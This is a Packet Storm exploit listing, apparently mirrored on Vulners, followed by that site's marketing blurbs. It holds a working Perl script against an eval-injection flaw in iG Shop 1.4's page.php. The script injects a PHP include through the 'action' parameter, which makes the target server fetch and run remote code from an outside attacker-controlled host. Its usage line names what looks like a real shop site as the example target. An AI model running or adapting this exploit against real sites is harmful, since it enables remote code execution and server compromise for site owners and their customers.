Lucene search
K

igshop14-eval.txt

🗓️ 20 Jun 2007 00:00:00Reported by IFXType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

iG Shop 1.4 eval Inclusion Vulnerability found by IFX #nyubicrew on page.ph

Code
`#!/usr/bin/perl -w  
use LWP::UserAgent;  
####################################################################  
#iG Shop 1.4 eval Inclusion Vulnerability  
#found by IFX #nyubicrew  
#Vulnerability on page.php  
#if (!$action)   
# $action = "make";  
#// here the function will be called.  
#eval ("page_$action();");  
####################################################################  
die "Example: perl $0 http://www.planetgolfuk.co.uk/shop\n" unless @ARGV;  
  
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  
$url = $ARGV[0] . "/page.php?action=|include(\$_GET\[cok\]);//phpinfo&cok=http://h1.ripside.net/ifx/a.txt?";  
  
$res = $b->request(HTTP::Request->new(GET=>$url));  
$respone = $res->content;  
  
if ($respone =~ /nyelipin file ;P/i){  
print "\nTembus...\n";  
print "\n$url\n";  
}  
else{  
print "\nGagal cok...\n";  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation